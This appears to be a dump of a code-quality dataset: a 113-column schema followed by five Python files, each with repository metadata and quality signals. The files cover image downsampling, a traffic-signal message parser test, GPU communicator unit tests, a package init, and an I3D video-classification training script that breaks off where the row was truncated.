Dataset schema (113 columns, `name: dtype`):

- hexsha: string, size: int64, ext: string, lang: string
- max_stars_repo_path: string, max_stars_repo_name: string, max_stars_repo_head_hexsha: string, max_stars_repo_licenses: list, max_stars_count: int64, max_stars_repo_stars_event_min_datetime: string, max_stars_repo_stars_event_max_datetime: string
- max_issues_repo_path: string, max_issues_repo_name: string, max_issues_repo_head_hexsha: string, max_issues_repo_licenses: list, max_issues_count: int64, max_issues_repo_issues_event_min_datetime: string, max_issues_repo_issues_event_max_datetime: string
- max_forks_repo_path: string, max_forks_repo_name: string, max_forks_repo_head_hexsha: string, max_forks_repo_licenses: list, max_forks_count: int64, max_forks_repo_forks_event_min_datetime: string, max_forks_repo_forks_event_max_datetime: string
- content: string, avg_line_length: float64, max_line_length: int64, alphanum_fraction: float64
- Scored quality signals (float64 unless noted): qsc_code_num_words_quality_signal (int64), qsc_code_num_chars_quality_signal, qsc_code_mean_word_length_quality_signal, qsc_code_frac_words_unique_quality_signal, qsc_code_frac_chars_top_2grams_quality_signal, qsc_code_frac_chars_top_3grams_quality_signal, qsc_code_frac_chars_top_4grams_quality_signal, qsc_code_frac_chars_dupe_5grams_quality_signal, qsc_code_frac_chars_dupe_6grams_quality_signal, qsc_code_frac_chars_dupe_7grams_quality_signal, qsc_code_frac_chars_dupe_8grams_quality_signal, qsc_code_frac_chars_dupe_9grams_quality_signal, qsc_code_frac_chars_dupe_10grams_quality_signal, qsc_code_frac_chars_replacement_symbols_quality_signal, qsc_code_frac_chars_digital_quality_signal, qsc_code_frac_chars_whitespace_quality_signal, qsc_code_size_file_byte_quality_signal, qsc_code_num_lines_quality_signal, qsc_code_num_chars_line_max_quality_signal, qsc_code_num_chars_line_mean_quality_signal, qsc_code_frac_chars_alphabet_quality_signal, qsc_code_frac_chars_comments_quality_signal, qsc_code_cate_xml_start_quality_signal, qsc_code_frac_lines_dupe_lines_quality_signal, qsc_code_cate_autogen_quality_signal, qsc_code_frac_lines_long_string_quality_signal, qsc_code_frac_chars_string_length_quality_signal, qsc_code_frac_chars_long_word_length_quality_signal, qsc_code_frac_lines_string_concat_quality_signal, qsc_code_cate_encoded_data_quality_signal, qsc_code_frac_chars_hex_words_quality_signal, qsc_code_frac_lines_prompt_comments_quality_signal, qsc_code_frac_lines_assert_quality_signal, qsc_codepython_cate_ast_quality_signal, qsc_codepython_frac_lines_func_ratio_quality_signal, qsc_codepython_cate_var_zero_quality_signal (bool), qsc_codepython_frac_lines_pass_quality_signal, qsc_codepython_frac_lines_import_quality_signal, qsc_codepython_frac_lines_simplefunc_quality_signal, qsc_codepython_score_lines_no_logic_quality_signal, qsc_codepython_frac_lines_print_quality_signal
- Per-signal flags (int64 unless noted): qsc_code_num_words, qsc_code_num_chars, qsc_code_mean_word_length, qsc_code_frac_words_unique (null), qsc_code_frac_chars_top_2grams, qsc_code_frac_chars_top_3grams, qsc_code_frac_chars_top_4grams, qsc_code_frac_chars_dupe_5grams, qsc_code_frac_chars_dupe_6grams, qsc_code_frac_chars_dupe_7grams, qsc_code_frac_chars_dupe_8grams, qsc_code_frac_chars_dupe_9grams, qsc_code_frac_chars_dupe_10grams, qsc_code_frac_chars_replacement_symbols, qsc_code_frac_chars_digital, qsc_code_frac_chars_whitespace, qsc_code_size_file_byte, qsc_code_num_lines, qsc_code_num_chars_line_max, qsc_code_num_chars_line_mean, qsc_code_frac_chars_alphabet, qsc_code_frac_chars_comments, qsc_code_cate_xml_start, qsc_code_frac_lines_dupe_lines, qsc_code_cate_autogen, qsc_code_frac_lines_long_string, qsc_code_frac_chars_string_length, qsc_code_frac_chars_long_word_length, qsc_code_frac_lines_string_concat (null), qsc_code_cate_encoded_data, qsc_code_frac_chars_hex_words, qsc_code_frac_lines_prompt_comments, qsc_code_frac_lines_assert, qsc_codepython_cate_ast, qsc_codepython_frac_lines_func_ratio, qsc_codepython_cate_var_zero, qsc_codepython_frac_lines_pass, qsc_codepython_frac_lines_import, qsc_codepython_frac_lines_simplefunc, qsc_codepython_score_lines_no_logic, qsc_codepython_frac_lines_print
- effective: string, hits: int64
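To make the schema concrete, here is a minimal sketch of loading such a table and filtering rows on its quality signals with pandas. The file name and thresholds are illustrative assumptions; this dump does not specify how or where the table is stored:

```python
import pandas as pd

# Hypothetical file name; the dump does not say where the table lives.
df = pd.read_parquet("code_quality_signals.parquet")

# Keep Python files that are not flagged as auto-generated or encoded data
# and whose duplicated 10-gram character mass is low (thresholds are
# illustrative, not taken from the dataset).
keep = df[
    (df["lang"] == "Python")
    & (df["qsc_code_cate_autogen_quality_signal"] == 0)
    & (df["qsc_code_cate_encoded_data_quality_signal"] == 0)
    & (df["qsc_code_frac_chars_dupe_10grams_quality_signal"] < 0.5)
]
print(keep[["max_stars_repo_name", "size", "hits"]].head())
```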
---

hexsha: 26713231c2d2ad84101b5ee73c2670563252a707 | size: 3,518 | ext: py | lang: Python

- repo: jfzhuang/IFR @ d6ffdd0c0810d7bb244f102ba8cc19c12f61e102, path: IFR/tools/data_downsample.py, licenses: ["MIT"] (identical across the max_stars, max_issues, and max_forks views)
- max_stars_count: 3 (events 2022-03-09T13:15:15.000Z to 2022-03-21T06:59:10.000Z) | max_issues_count: null | max_forks_count: null

content:

```python
import os
import cv2
import glob
def main_seq():
    gt_path = './data/cityscapes/leftImg8bit_sequence/train'
    save_path = './data/cityscapes/leftImg8bit_sequence_down_2x/train'
    subdirs = sorted(glob.glob(os.path.join(gt_path, '*')))
    for i, subdir in enumerate(subdirs):
        subdir = subdir.replace(gt_path + '/', '')
        names = sorted(glob.glob(os.path.join(gt_path, subdir, '*.png')))
        if not os.path.exists(os.path.join(save_path, subdir)):
            os.makedirs(os.path.join(save_path, subdir))
        for j, name in enumerate(names):
            print('{}/{} {}/{}'.format(i, len(subdirs), j, len(names)))
            name = name.replace(os.path.join(gt_path, subdir) + '/', '')
            gt = cv2.imread(os.path.join(gt_path, subdir, name))
            gt = cv2.resize(gt, (1024, 512), interpolation=cv2.INTER_LINEAR)
            cv2.imwrite(os.path.join(save_path, subdir, name), gt)

    gt_path = './data/cityscapes/leftImg8bit_sequence/val'
    save_path = './data/cityscapes/leftImg8bit_sequence_down_2x/val'
    subdirs = sorted(glob.glob(os.path.join(gt_path, '*')))
    for i, subdir in enumerate(subdirs):
        subdir = subdir.replace(gt_path + '/', '')
        names = sorted(glob.glob(os.path.join(gt_path, subdir, '*.png')))
        if not os.path.exists(os.path.join(save_path, subdir)):
            os.makedirs(os.path.join(save_path, subdir))
        for j, name in enumerate(names):
            print('{}/{} {}/{}'.format(i, len(subdirs), j, len(names)))
            name = name.replace(os.path.join(gt_path, subdir) + '/', '')
            gt = cv2.imread(os.path.join(gt_path, subdir, name))
            gt = cv2.resize(gt, (1024, 512), interpolation=cv2.INTER_LINEAR)
            cv2.imwrite(os.path.join(save_path, subdir, name), gt)


def main_gt():
    gt_path = './data/cityscapes/gtFine/train'
    save_path = './data/cityscapes/gtFine_down_2x/train'
    subdirs = sorted(glob.glob(os.path.join(gt_path, '*')))
    for i, subdir in enumerate(subdirs):
        subdir = subdir.replace(gt_path + '/', '')
        names = sorted(glob.glob(os.path.join(gt_path, subdir, '*_gtFine_labelTrainIds.png')))
        if not os.path.exists(os.path.join(save_path, subdir)):
            os.makedirs(os.path.join(save_path, subdir))
        for j, name in enumerate(names):
            print(i, j)
            name = name.replace(os.path.join(gt_path, subdir) + '/', '')
            gt = cv2.imread(os.path.join(gt_path, subdir, name), 0)
            gt = cv2.resize(gt, (1024, 512), interpolation=cv2.INTER_NEAREST)
            cv2.imwrite(os.path.join(save_path, subdir, name), gt)

    gt_path = './data/cityscapes/gtFine/val'
    save_path = './data/cityscapes/gtFine_down_2x/val'
    subdirs = sorted(glob.glob(os.path.join(gt_path, '*')))
    for i, subdir in enumerate(subdirs):
        subdir = subdir.replace(gt_path + '/', '')
        names = sorted(glob.glob(os.path.join(gt_path, subdir, '*_gtFine_labelTrainIds.png')))
        if not os.path.exists(os.path.join(save_path, subdir)):
            os.makedirs(os.path.join(save_path, subdir))
        for j, name in enumerate(names):
            print(i, j)
            name = name.replace(os.path.join(gt_path, subdir) + '/', '')
            gt = cv2.imread(os.path.join(gt_path, subdir, name), 0)
            gt = cv2.resize(gt, (1024, 512), interpolation=cv2.INTER_NEAREST)
            cv2.imwrite(os.path.join(save_path, subdir, name), gt)


if __name__ == '__main__':
    main_seq()
    main_gt()
```

avg_line_length: 45.688312 | max_line_length: 94 | alphanum_fraction: 0.613701
qsc quality signals and flags (schema order): 487 | 3,518 | 4.285421 | 0.102669 | 0.091998 | 0.134164 | 0.091998 | 0.967897 | 0.96023 | 0.916148 | 0.889315 | 0.850024 | 0.850024 | 0 | 0.02 | 0.218306 | 3,518 | 76 | 95 | 46.289474 | 0.738909 | 0 | 0 | 0.75 | 0 | 0 | 0.120523 | 0.105742 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | false | 0 | 0.046875 | 0 | 0.078125 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
effective: 0 | hits: 7
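The three named statistics can be sanity-checked against the record above; a minimal sketch of one plausible definition follows (the dump does not spell out the exact formulas; note that avg_line_length 45.688312 is 3,518/77 while qsc_code_num_chars_line_mean 46.289474 is 3,518/76, so the two apparently use slightly different line counts):

```python
# One plausible reading of the basic statistics columns; the pipeline's
# exact definitions are an assumption, not documented in this dump.
def basic_stats(content: str):
    # split("\n") yields a final empty entry when the file ends with a newline
    lines = content.split("\n")
    avg_line_length = len(content) / len(lines)
    max_line_length = max(len(line) for line in lines)
    alphanum_fraction = sum(ch.isalnum() for ch in content) / len(content)
    return avg_line_length, max_line_length, alphanum_fraction
```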
---

hexsha: cd08eee775962a3c59e4c3b176c5cab95f07c12d | size: 3,034 | ext: py | lang: Python

- repo: mcity/Mcity-battelle-spat-parser @ fafcc8f6b5fa9baf390068d8dbcd9df0351a516f, path: test_c_tscbm.py, licenses: ["MIT"] (identical across the max_stars, max_issues, and max_forks views)
- max_stars_count: 5 (events 2020-05-06T13:18:35.000Z to 2022-03-28T20:01:29.000Z) | max_issues_count: 1 (events 2021-12-09T06:52:52.000Z to 2021-12-09T06:52:52.000Z) | max_forks_count: 3 (events 2021-02-06T00:30:06.000Z to 2021-12-09T06:55:28.000Z)

content:

```python
##Run a Shared Library version of the TSCBM parser function.
import ctypes
from ctypes import util
##Attach to our library
lib = ctypes.CDLL('./libtscbm.so')
##Attach to C library so we can free memory when done with it.
libc = ctypes.CDLL(util.find_library('c'))
test = '1100110100010000000000010000000011011100000000101010101000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000001111101000000001101110000000010101010100000000000000000000000000000000000000011000000001101110000000001110110110000000000000000000000000000000000000000000000000000000000000000000001000000000000111111000000001011110000000000001111110000000010111100000000000000000000000000000000000000010100000000001111110000001011010100000000000000000000000000000000000000000000000000000000000000000000000110000000000000000000000000100100110000000000111111000000101101010000000000000000000000000000000000000001110000000000111111000000001101001000000000000000000000000000000000000000000000000000000000000000000000100000000000001111110000000110100001000000000011111100000001101000010000000000000000000000000000000000001001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011011101000000000000000000000000001000100000000011111111000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100001011101000000000011111011001010000000111100111000000000000000000000000000000000'.encode('utf-8')
test_id = '10'.encode('utf-8')
test_time = '2019-08-12 10:41:55'.encode('utf-8')
##Specify the function parameters and types for our functions.
lib.parseTSCBM.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p]
lib.parseTSCBM.restype = ctypes.c_void_p
libc.free.argtypes = (ctypes.c_void_p,)
## Wrap the call in a function so we can ensure the free is called each time.
def parse_TSCBM(in_hex, in_id, in_date):
    _ptr = lib.parseTSCBM(in_hex, in_id, in_date)
    result = ctypes.cast(_ptr, ctypes.c_char_p,).value
    #print(hex(_ptr))
    libc.free(_ptr)
    return result
import json
print (parse_TSCBM(test, test_id, test_time).decode('utf-8'))
#test2 = json.loads(parse_TSCBM(test, test_id, test_time).decode('utf-8'))
#import pickle
#print (pickle.dumps(test2))
```

avg_line_length: 97.870968 | max_line_length: 1,985 | alphanum_fraction: 0.905405
qsc quality signals and flags (schema order): 188 | 3,034 | 14.441489 | 0.425532 | 0.01547 | 0.020258 | 0.022099 | 0.062615 | 0.052302 | 0.041252 | 0.041252 | 0.027993 | 0.027993 | 0 | 0.685685 | 0.046803 | 3,034 | 31 | 1,986 | 97.870968 | 0.253112 | 0.132828 | 0 | 0 | 0 | 0 | 0.769966 | 0.748949 | 0 | 1 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.176471 | 0 | 0.294118 | 0.058824 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
effective: 0 | hits: 7
---

hexsha: cd2aff6ae46a59a501c5d6e64b13165d366741cc | size: 10,515 | ext: py | lang: Python

- repo: fuhailin/HybridBackend @ 113383c5870b7180fa67c194208a27f76bdbf3f0, path: hybridbackend/tensorflow/distribute/communicator_alltoallw_test.py, licenses: ["Apache-2.0"] (identical across the max_stars, max_issues, and max_forks views)
- max_stars_count: 38 (events 2021-12-01T06:54:36.000Z to 2022-03-23T11:23:21.000Z) | max_issues_count: 15 (events 2021-12-01T09:15:26.000Z to 2022-03-28T02:49:21.000Z) | max_forks_count: 8 (events 2021-12-02T01:16:14.000Z to 2022-01-28T04:51:16.000Z)

content:

```python
# Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
r'''Tests for Alltoallw.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import os
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
import hybridbackend.tensorflow as hb
import hybridbackend.test as hbtest
import unittest
# pylint: disable=missing-docstring
@unittest.skipUnless(
os.getenv('HYBRIDBACKEND_WITH_CUDA') == 'ON', 'GPU required')
class AlltoallwTest(unittest.TestCase):
  def setUp(self):  # pylint: disable=invalid-name
    os.environ['CUDA_VISIBLE_DEVICES'] = '0,1'
    os.environ['TF_CPP_VMODULE'] = 'nccl_alltoallw=1'

  def tearDown(self):  # pylint: disable=invalid-name
    del os.environ['TF_CPP_VMODULE']
    del os.environ['CUDA_VISIBLE_DEVICES']

  def test_alltoallw(self):
    hb.context.options.update(comm_pubsub_device='')
    devices = ['/gpu:0', '/gpu:1']
    comm_id = 'alltoallw_test'
    server = hb.train.Server({'localhost': ['localhost:0']})
    shapes = [[[1023, 4, 16], [526, 4, 16]], [[400, 4, 16], [99, 4, 16]]]
    expected = []
    actual = []
    try:
      with tf.Graph().as_default():
        for i, d in enumerate(devices):
          with tf.device(d):
            comm = hb.distribute.Communicator.build(comm_id, devices)
            inputs = [
              tf.get_variable(
                f'input_{i}/from_{j}',
                initializer=tf.random_normal(
                  shapes[i][j], mean=100, stddev=80))
              for j, _ in enumerate(devices)]
            transposed = comm.alltoallw(inputs, common_shape=[4, 16])
            actual.append(transposed)
            expected.append(inputs)
        expected = list(map(list, zip(*expected)))  # transpose the inputs.
        with server.monitored_session() as sess:
          results = sess.run({'actual': actual, 'expected': expected})
          for act, exp in zip(results['actual'], results['expected']):
            for acti, expi in zip(act, exp):
              np.testing.assert_allclose(expi, acti, rtol=1e-6)
    finally:
      del server

  def test_alltoallw_fp16(self):
    hb.context.options.update(comm_pubsub_device='')
    os.environ['HB_COMM_WIRE_DTYPE_FLOAT'] = 'float16'
    devices = ['/gpu:0', '/gpu:1']
    comm_id = 'alltoallw_fp16_test'
    server = hb.train.Server({'localhost': ['localhost:0']})
    shapes = [[[1023, 4, 16], [526, 4, 16]], [[400, 4, 16], [99, 4, 16]]]
    expected = []
    actual = []
    try:
      with tf.Graph().as_default():
        for i, d in enumerate(devices):
          with tf.device(d):
            comm = hb.distribute.Communicator.build(
              comm_id, devices, impl=hb.distribute.NcclCommunicator)
            inputs = [
              tf.get_variable(
                f'input_{i}/from_{j}',
                initializer=tf.random_normal(
                  shapes[i][j], mean=100, stddev=80))
              for j, _ in enumerate(devices)]
            transposed = comm.alltoallw(inputs, common_shape=[4, 16])
            actual.append(transposed)
            expected.append(inputs)
        expected = list(map(list, zip(*expected)))  # transpose the inputs.
        with server.monitored_session() as sess:
          results = sess.run({'actual': actual, 'expected': expected})
          for act, exp in zip(results['actual'], results['expected']):
            for acti, expi in zip(act, exp):
              np.testing.assert_allclose(expi, acti, rtol=1e-2)
    finally:
      del server
      del os.environ['HB_COMM_WIRE_DTYPE_FLOAT']

  def test_alltoallw_grad(self):
    hb.context.options.update(comm_pubsub_device='')
    devices = ['/gpu:0', '/gpu:1']
    comm_id = 'alltoallw_grad_test'
    server = hb.train.Server({'localhost': ['localhost:0']})
    values = [[1.0, 2.4], [9.6, 8.8]]
    shapes = [[[6, 2, 3], [8, 2, 3]], [[10, 2, 3], [12, 2, 3]]]
    lrs = [1.0, 3.0]
    grad_ys = [2.0]
    all_ys = []
    all_inputs = []
    try:
      with tf.Graph().as_default():
        for i, d in enumerate(devices):
          with tf.device(d):
            comm = hb.distribute.Communicator.build(comm_id, devices)
            inputs = [
              tf.constant(values[i][j], shape=shapes[i][j])
              for j, _ in enumerate(devices)]
            all_inputs.append(inputs)
            outputs = comm.alltoallw(inputs, common_shape=[2, 3])
            all_ys.append(
              tf.reduce_sum(tf.concat(outputs, axis=0)) * lrs[i])
        with tf.device(devices[0]):
          xs = [y for x in all_inputs for y in x]
          ys = [tf.add_n(all_ys)]
          actual = tf.gradients(
            ys, xs, grad_ys, colocate_gradients_with_ops=True)
          baseline_all_outputs = list(map(list, zip(*all_inputs)))
          baseline_all_ys = [
            tf.reduce_sum(
              tf.concat(baseline_all_outputs[i], axis=0)) * lrs[i]
            for i, _ in enumerate(devices)]
          baseline_ys = [tf.add_n(baseline_all_ys)]
          expected = tf.gradients(
            baseline_ys, xs, grad_ys, colocate_gradients_with_ops=True)
        with server.monitored_session() as sess:
          results = sess.run({'actual': actual, 'expected': expected})
          for act, exp in zip(results['actual'], results['expected']):
            for acti, expi in zip(act, exp):
              np.testing.assert_allclose(expi, acti, rtol=1e-6)
    finally:
      del server

  def test_alltoallw_grad_fp16(self):
    hb.context.options.update(comm_pubsub_device='')
    os.environ['HB_COMM_WIRE_DTYPE_FLOAT'] = 'float16'
    devices = ['/gpu:0', '/gpu:1']
    comm_id = 'alltoallw_grad_fp16_test'
    server = hb.train.Server({'localhost': ['localhost:0']})
    values = [[1.0, 2.4], [9.6, 8.8]]
    shapes = [[[6, 2, 3], [8, 2, 3]], [[10, 2, 3], [12, 2, 3]]]
    lrs = [1.0, 3.0]
    grad_ys = [2.0]
    all_ys = []
    all_inputs = []
    try:
      with tf.Graph().as_default():
        for i, d in enumerate(devices):
          with tf.device(d):
            comm = hb.distribute.Communicator.build(
              comm_id, devices, impl=hb.distribute.NcclCommunicator)
            inputs = [
              tf.constant(values[i][j], shape=shapes[i][j])
              for j, _ in enumerate(devices)]
            all_inputs.append(inputs)
            outputs = comm.alltoallw(inputs, common_shape=[2, 3])
            all_ys.append(
              tf.reduce_sum(tf.concat(outputs, axis=0)) * lrs[i])
        with tf.device(devices[0]):
          xs = [y for x in all_inputs for y in x]
          ys = [tf.add_n(all_ys)]
          actual = tf.gradients(
            ys, xs, grad_ys, colocate_gradients_with_ops=True)
          baseline_all_outputs = list(map(list, zip(*all_inputs)))
          baseline_all_ys = [
            tf.reduce_sum(
              tf.concat(baseline_all_outputs[i], axis=0)) * lrs[i]
            for i, _ in enumerate(devices)]
          baseline_ys = [tf.add_n(baseline_all_ys)]
          expected = tf.gradients(
            baseline_ys, xs, grad_ys, colocate_gradients_with_ops=True)
        with server.monitored_session() as sess:
          results = sess.run({'actual': actual, 'expected': expected})
          for act, exp in zip(results['actual'], results['expected']):
            for acti, expi in zip(act, exp):
              np.testing.assert_allclose(expi, acti, rtol=1e-2)
    finally:
      del server
      del os.environ['HB_COMM_WIRE_DTYPE_FLOAT']

  def test_alltoallw_multi_steps(self):
    hb.context.options.update(comm_pubsub_device='')
    devices = ['/gpu:0', '/gpu:1']
    comm_id = 'alltoallw_multistep_test'
    server = hb.train.Server({'localhost': ['localhost:0']})
    shapes = [[[10230, 64], [5260, 64]], [[4000, 64], [990, 64]]]
    train_ops = []
    try:
      with tf.Graph().as_default():
        for i, d in enumerate(devices):
          with tf.device(d):
            comm = hb.distribute.Communicator.build(comm_id, devices)
            inputs = [
              tf.get_variable(
                f'input_{i}/from_{j}',
                initializer=tf.random_normal(
                  shapes[i][j], mean=100, stddev=80))
              for j, _ in enumerate(devices)]
            transposed = comm.alltoallw(inputs, common_shape=[64])
            train_op = [
              tf.matmul(m, m, transpose_a=True) for m in transposed]
            train_ops.append(train_op)
        with server.monitored_session() as sess:
          for _ in xrange(100):
            sess.run(train_ops)
    finally:
      del server

  def test_mutli_alltoallw_multi_steps(self):
    hb.context.options.update(comm_pubsub_device='')
    devices = ['/gpu:0', '/gpu:1']
    comm_id = 'multi_alltoallw_multistep_test'
    num_comms = 2
    server = hb.train.Server({'localhost': ['localhost:0']})
    train_ops = []
    try:
      with tf.Graph().as_default():
        for i, d in enumerate(devices):
          with tf.device(d):
            for c in xrange(num_comms):
              shapes = [
                [[1023 + c, 64], [526 + c, 64]],
                [[400 + c, 64], [99 + c, 64]]]
              inputs = [
                tf.get_variable(
                  f'comm_{c}/input_{i}/from_{j}',
                  initializer=tf.random_normal(
                    shapes[i][j], mean=100, stddev=80))
                for j, _ in enumerate(devices)]
              comm = hb.distribute.Communicator.build(
                f'{comm_id}_{c}', devices)
              transposed = comm.alltoallw(inputs, common_shape=[64])
              train_op = [
                tf.matmul(m, m, transpose_a=True) for m in transposed]
              train_ops.append(train_op)
        with server.monitored_session() as sess:
          for _ in xrange(100):
            sess.run(train_ops)
    finally:
      del server


if __name__ == '__main__':
  hbtest.main(f'{__file__}.xml')
```

avg_line_length: 38.800738 | max_line_length: 79 | alphanum_fraction: 0.583738
qsc quality signals and flags (schema order): 1,356 | 10,515 | 4.35767 | 0.171829 | 0.014216 | 0.042647 | 0.020308 | 0.813843 | 0.777966 | 0.777966 | 0.771535 | 0.771535 | 0.760704 | 0 | 0.031958 | 0.273894 | 10,515 | 270 | 80 | 38.944444 | 0.741978 | 0.081598 | 0 | 0.819742 | 0 | 0 | 0.081404 | 0.023258 | 0 | 0 | 0 | 0 | 0.017167 | 1 | 0.034335 | false | 0 | 0.042918 | 0 | 0.081545 | 0.004292 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
effective: 0 | hits: 7
---

hexsha: 26ce112c546196aec241fc0e594e224577a0e429 | size: 177 | ext: py | lang: Python

- repo: GeorgeVasiliadis/GreParl @ 10c085c9892ff156aeb13401063c9e0e20d0baff, path: greparl/SearchEngine/__init__.py, licenses: ["MIT"] (identical across the max_stars, max_issues, and max_forks views)
- max_stars_count: null | max_issues_count: null | max_forks_count: null

content:

```python
from .backend import Speech
from .backend import SpeechBackend as SearchEngine
from .backend import SpeechFile
from .preprocessing.create import create_inverted_index as index
```

avg_line_length: 29.5 | max_line_length: 64 | alphanum_fraction: 0.853107
qsc quality signals and flags (schema order): 23 | 177 | 6.478261 | 0.521739 | 0.221477 | 0.342282 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.118644 | 177 | 5 | 65 | 35.4 | 0.955128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0
effective: 0 | hits: 7
---

hexsha: f895a8dda604c7dcd774acbafea8f9329c833141 | size: 20,478 | ext: py | lang: Python

- repo: chenwei850825/sign-language @ 42b0b969dc4f7fd3471686b17b90422abd283edc, path: train_i3d.py, licenses: ["MIT"] (identical across the max_stars, max_issues, and max_forks views)
- max_stars_count: null | max_issues_count: null | max_forks_count: null

content:

```python
"""
https://github.com/FrederikSchorr/sign-language
Train a pre-trained I3D convolutional network to classify videos
"""
import os
import glob
import time
import sys
import numpy as np
import pandas as pd
import keras
from keras import backend as K
from datagenerator import VideoClasses, FramesGenerator, generate_generator_multiple
from model_i3d import Inception_Inflated3d, add_i3d_top, model_fusion
import tensorflow as tf
from keras.models import Model, load_model
def layers_freeze(keModel:keras.Model) -> keras.Model:
    print("Freeze all %d layers in Model %s" % (len(keModel.layers), keModel.name))
    for layer in keModel.layers:
        layer.trainable = False
    return keModel


def layers_unfreeze(keModel:keras.Model) -> keras.Model:
    print("Unfreeze all %d layers in Model %s" % (len(keModel.layers), keModel.name))
    for layer in keModel.layers:
        layer.trainable = True
    return keModel


def count_params(keModel:keras.Model):
    #trainable_count = int(
    #    np.sum([K.count_params(p) for p in set(keModel.trainable_weights)]))
    #non_trainable_count = int(
    #    np.sum([K.count_params(p) for p in set(keModel.non_trainable_weights)]))
    trainable_count = keras.utils.layer_utils.count_params(keModel.trainable_weights)
    non_trainable_count = keras.utils.layer_utils.count_params(keModel.non_trainable_weights)

    print('Total params: {:,}'.format(trainable_count + non_trainable_count))
    print('Trainable params: {:,}'.format(trainable_count))
    print('Non-trainable params: {:,}'.format(non_trainable_count))
    return


def train_I3D_oflow_end2end(diVideoSet):
    """
    * Loads pretrained I3D model,
    * reads optical flow data generated from training videos,
    * adjusts top-layers adequately for video data,
    * trains only news top-layers,
    * then fine-tunes entire neural network,
    * saves logs and models to disc.
    """

    # directories
    sFolder = "%03d-%d"%(diVideoSet["nClasses"], diVideoSet["nFramesNorm"])
    sClassFile = "data-set/%s/%03d/class.csv"%(diVideoSet["sName"], diVideoSet["nClasses"])
    #sVideoDir = "data-set/%s/%03d"%(diVideoSet["sName"], diVideoSet["nClasses"])
    #sImageDir = "data-temp/%s/%s/image"%(diVideoSet["sName"], sFolder)
    #sImageFeatureDir = "data-temp/%s/%s/image-i3d"%(diVideoSet["sName"], sFolder)
    sOflowDir = "data-temp/%s/%s/oflow"%(diVideoSet["sName"], sFolder)
    #sOflowFeatureDir = "data-temp/%s/%s/oflow-i3d"%(diVideoSet["sName"], sFolder)
    sModelDir = "model_flow_mirror"

    diTrainTop = {
        "fLearn" : 1e-3,
        "nEpochs" : 3}

    diTrainAll = {
        "fLearn" : 1e-4,
        "nEpochs" : 17}

    nBatchSize = 1

    print("\nStarting I3D end2end training ...")
    print(os.getcwd())

    # read the ChaLearn classes
    #oClasses = VideoClasses(sClassFile)

    # Load training data
    genFramesTrain = FramesGenerator(sOflowDir + "/train_videos", nBatchSize,
        diVideoSet["nFramesNorm"], 224, 224, 2)
    genFramesVal = FramesGenerator(sOflowDir + "/val_videos", nBatchSize,
        diVideoSet["nFramesNorm"], 224, 224, 2)

    # Load pretrained i3d model and adjust top layer
    print("Load pretrained I3D flow model ...")
    keI3DOflow = Inception_Inflated3d(
        include_top=False,
        weights='flow_imagenet_and_kinetics',
        #weights='model/20200704-1221-tsl100-oflow-i3d-entire-best.h5',
        input_shape=(diVideoSet["nFramesNorm"], 224, 224, 2))
    print("Add top layers with %d output classes ..." % 63)
    keI3DOflow = layers_freeze(keI3DOflow)
    keI3DOflow = add_i3d_top(keI3DOflow, 63, dropout_prob=0.5)

    # Prep logging
    sLog = time.strftime("%Y%m%d-%H%M", time.gmtime()) + \
        "-%s%03d-%03d-oflow-i3d"%(diVideoSet["sName"], diVideoSet["nClasses"], diVideoSet["nFramesNorm"])

    # Helper: Save results
    csv_logger = tf.keras.callbacks.CSVLogger("log_flow_mirror/" + sLog + "-acc_above.csv", append = True)

    # Helper: Save the model
    os.makedirs(sModelDir, exist_ok=True)
    cpTopLast = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-above-last.h5", verbose = 0)
    cpTopBest = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-above-best.h5",
